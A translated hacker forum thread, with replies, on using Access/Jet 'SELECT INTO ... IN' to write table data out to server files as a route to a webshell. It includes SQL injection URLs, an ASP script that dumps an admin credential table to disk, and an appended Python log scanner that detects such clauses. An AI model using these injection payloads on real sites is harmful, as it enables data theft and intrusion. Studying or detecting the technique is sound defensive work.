Study on Shell exported from access: kevin1986

Source: Internet
Author: User
Tags dbase dsn
Today I fell asleep in chemistry class (Khan ......) and dreamed of penetrating a magic = off PHP injection point. I was drooling happily (..... slept too much), then suddenly woke up and immediately wrote the dream idea down on paper: export a webshell using Access ...... isn't it amazing?

So I checked the Internet at night and found several studies on exporting from a database.

Program code:
Select * into [mytest.txt] in 'd:/' 'text;' from mydata

Exported to a TXT file. The file is successfully exported.

Program code:
Select * into [AAA] in 'd:/' 'dbase IV;' from mydata

Exported to the DBF file.
However, it is indeed a bit weird that files cannot be exported with ASP or other suffixes. I personally think the suffix is decided by the type selected, such as 'text;' and 'dbase IV;'. So I checked the ODBC data sources, and it seems that there is no custom type. It is very depressing .....
There was no way around it, so I asked superhei... He said he hasn't studied it either. Hey hey, it's still a new idea... it seems I need to study more.
Soon I found an article on chinaasppro saying that the database could be exported like this, that is, to back up some data. But I failed to execute the command in the MySQL database manager of veterans, and I do not know the cause. After reading it carefully, though, it imports into MERs in C:/temp.mdb, which is not an export at all. Ah, bad luck ..

Program code:
Insert into MERs in 'C:/temp.mdb' select * from [new customers]

I remember that a long time ago I saw an article about how to export database files into arbitrary files. In that case a shell could be obtained, but I still did not succeed. If anyone has succeeded, add me on QQ and let's discuss it together.
9817500

In fact, if it were possible, it would be simple. Take an injection point such as
http://www.www.com/a.asp?id=1
We can change it like this:
www.com/a.asp?id=-1 union select 1, 2, 4, 5, said, 7, 8, 9 from users where id = 1
In this way, we get the content of the said file, and then we can export it like this, for example into a TXT file:
www.com/a.asp?id=-1 union select 1, 2, 4, 5, said, 7, 8, 9 from users where id = 1 into [hackedbykevin.txt] in 'e:/' 'text;' from users where id = 1
In theory, E:/hackedbykevin.txt is generated.
But something very depressing happened during the test, and I don't know why ....

Reference content:
Microsoft Jet Database Engine error '20140901'

Action query cannot be the source of a row.

/INFO/adm2.asp, Row 7

It's very late. I haven't studied it any more... I have studied it for you. The hacker spirit is sharing.

  Sniper commented on AM: 


Using into at the end of union is not feasible. I have tested it before.



  Kevin1986 posted a comment at pm: 


Union does not work. However, when I got a leadbbs, I used the SQL statement in it to execute it once, but it didn't use Union. Let's discuss with you later. Recently I really want to get the ASP + MySQL system... Let's take a look at the 4ngel stuff. Let's call Xiao.



  Superhei posted a comment at pm: 


Xixi, I had no time to test it last time. I tested it today.
<%
Set conn = Server.CreateObject("ADODB.Connection")
DSN = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("Q.mdb")
Set rs = Server.CreateObject("ADODB.Recordset")
conn.Open DSN
SQL = "select * into [mytest112.txt] in 'C:/' 'text;' from admin;"
rs.Open SQL, conn
If rs.EOF And rs.BOF Then
'Access denied
Else
'Access allowed
End If
rs.Close
Set rs = Nothing
'Close the connection
conn.Close
Set conn = Nothing
Response.Write "SQL:" & SQL

%>
This is successful.
C:/> dir mytest*.txt
The volume in drive C is aaaaaaa
The serial number of the volume is 3cee-a8a9.

C:/directory

46 mytest112.txt
One file contains 46 bytes.
0 directories, 885,846,016 available bytes

C:/> type mytest112.txt
"ID", "f_name", "f_password"
1, "admin", "pass"

The statement is select * into [mytest112.txt] in 'C:/' 'text;' from admin; Because of where into [mytest112.txt] in 'C:/' 'text;' has to sit in the statement, it cannot be exported through the injection (select * from Admin where id = $id)

If union is used, the following error occurs: (however, even if it could be used, it would not make much sense, because if ASP and the like cannot be exported, there is no need to export data alone, since union can do that directly :)
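
A defender-side check for the statements discussed on this page, as an added example that is not part of the original post or its comments: it scans web-server log lines for an INTO target followed by the Jet IN '<path>' '<type>;' clause, which is what points the output at a file outside the database. The log layout, the sample lines and the function names are constructed for illustration; a clause with no type string is reported as "mdb", since Jet then treats the path as an Access database.

```python
import re
from urllib.parse import unquote_plus

# Jet "IN" clause aiming SELECT INTO / INSERT INTO at an external file:
#   INTO <table> IN '<path>' ['<ISAM type>;']
EXTERNAL_IN = re.compile(
    r"""\binto\s+(?P<table>\[[^\]]+\]|[\w.]+)\s+in\s+
        '(?P<path>[^']*)'\s*(?:'(?P<isam>[^';]+);[^']*')?""",
    re.IGNORECASE | re.VERBOSE,
)

def find_external_writes(text):
    """Return (table, path, isam) for every external-file clause in text."""
    hits = []
    for m in EXTERNAL_IN.finditer(text):
        # No type string means the path is an Access database (assumed label "mdb").
        isam = (m.group("isam") or "mdb").strip().lower()
        hits.append((m.group("table").strip("[]"), m.group("path"), isam))
    return hits

def scan_log(lines):
    """Scan W3C-style lines: date time method uri-stem uri-query status."""
    alerts = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if line.startswith("#") or len(parts) < 6:
            continue
        stem, query = parts[3], unquote_plus(parts[4])
        for table, path, isam in find_external_writes(query):
            alerts.append({
                "line": n, "page": stem, "table": table, "path": path,
                "isam": isam, "status": parts[5],
                # UNION plus INTO is the variant the comments report as failing.
                "via_union": bool(re.search(r"\bunion\b", query, re.I)),
            })
    return alerts

# Constructed sample log (not taken from the original page).
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-01-01 10:00:01 GET /a.asp id=1 200",
    "2024-01-01 10:00:07 GET /a.asp id=-1+union+select+1,2+from+users+into+%5Bout.txt%5D+in+%27e:/%27+%27text;%27+from+users 500",
    "2024-01-01 10:00:09 GET /list.asp name=x&cat=in+%27books%27 200",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A hit with status 500 and via_union set matches the failed attempt described in the post; a hit on a page that answers 200 deserves a check of the target directory for newly created files.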
